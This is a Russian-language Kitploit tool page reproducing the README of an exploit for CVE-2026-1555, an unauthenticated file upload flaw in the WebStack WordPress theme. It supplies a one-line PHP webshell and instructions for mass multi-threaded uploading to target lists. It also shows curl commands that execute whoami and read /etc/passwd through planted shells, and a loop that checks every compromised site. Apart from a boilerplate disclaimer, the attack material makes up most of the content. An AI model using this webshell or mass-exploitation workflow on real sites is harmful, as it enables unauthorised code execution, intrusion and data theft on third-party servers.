Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-1555
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - Неаутентифицированная произвольная загрузка файлов

Репозиторий
914 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1555

WebStack <= 1.2024 - неаутентифицированная произвольная загрузка файлов

👤 Автор: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — WebStack WordPress: произвольная загрузка файлов

Неаутентифицированное удалённое выполнение кода через AJAX-обработчик img_upload

Python CVE CVSS Auth


📌 Обзор уязвимости

🔬 Техническая первопричина

Функция io_img_upload(), зарегистрированная в WordPress в хуке действия img_upload файла admin-ajax.php, не выполняет вообще никакой проверки типа файла или расширения перед записью загружаемого файла на сервер. Поскольку действие зарегистрировано без проверки аутентификации (wp_ajax_nopriv_), любой неаутентифицированный удалённый злоумышленник может отправить через POST произвольный файл — включая PHP-вебшелл, — и сервер сохранит его по общедоступному пути, что позволяет напрямую выполнить произвольный код.

Уязвимая конечная точка:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ Возможности инструмента

  • 🔁 Многопоточное сканирование с настраиваемым количеством рабочих потоков
  • 📋 Поддержка массового сканирования целей через файл со списком целей
  • 📤 Автоматическое извлечение URL-адреса шелла из JSON-ответа
  • 💾 URL-адреса успешных шеллов сохраняются в uploaded_paths.txt
  • 🎨 Богатый терминальный интерфейс с отслеживанием прогресса в реальном времени
  • 🔕 Проверка SSL отключена для максимальной совместимости

📦 Требования

Версия Python: 3.8+

Установите зависимости:

root@kitploit:~
pip install requests rich urllib3

🚀 Использование

1. Подготовьте список целей

Создайте файл с именем list.txt (или любым другим на ваш выбор) с одной целью на строку:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Целям без http:// или https:// автоматически добавляется префикс http://.

2. Подготовьте нагрузку

Поместите ваш вебшелл в ту же директорию, что и скрипт. Пример:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. Запустите инструмент

root@kitploit:~
python CVE-2026-1555.py

Программа запросит у вас:


📤 Вывод и извлечение шелла

Вывод в реальном времени

Каждая успешная загрузка выводит:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

Сохранённые результаты

Все URL-адреса успешных шеллов добавляются в:

root@kitploit:~
uploaded_paths.txt

Доступ к вашему шеллу

После успешной загрузки вы можете получить доступ к шеллу напрямую через браузер или curl:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

Точный путь загрузки извлекается из JSON-ответа сервера (data.src) и выводится автоматически.

Пакетная проверка шеллов

Быстро проверьте все загруженные шеллы из выходного файла:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 Итоговая сводка

В конце каждого запуска выводится сводка:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ Структура файлов

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ Отказ от ответственности

Этот инструмент предоставляется строго для авторизованного тестирования на проникновение, исследований в области безопасности и образовательных целей.

Автор — Nxploited — не несёт никакой ответственности за любое неправомерное использование, ущерб или незаконную деятельность, совершённые с помощью этого инструмента. Используя этот инструмент, вы подтверждаете, что имеете явное письменное разрешение на тестирование всех целевых систем.

Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, противозаконно и может повлечь уголовное преследование в соответствии с применимым законодательством о киберпреступности.

Используйте ответственно. Вы полностью отвечаете за свои действия.


👤 Автор: Nxploited 📣 Канал: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

Скачать инструмент
ПолеОписание
CVE IDCVE-2026-1555
Поражённый компонентТема WebStack для WordPress
Уязвимые версииВсе версии вплоть до 1.2024 включительно
Тип уязвимостиПроизвольная загрузка файлов → удалённое выполнение кода
Требуется аутентификация❌ Нет (без аутентификации)
Оценка CVSS9.8 КРИТИЧЕСКАЯ
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ЗапросОписаниеПо умолчанию
Targets fileПуть к вашему списку целейlist.txt
ThreadsКоличество одновременных рабочих потоков6
Local file to uploadИмя файла вашей нагрузки (в директории скрипта)shell.php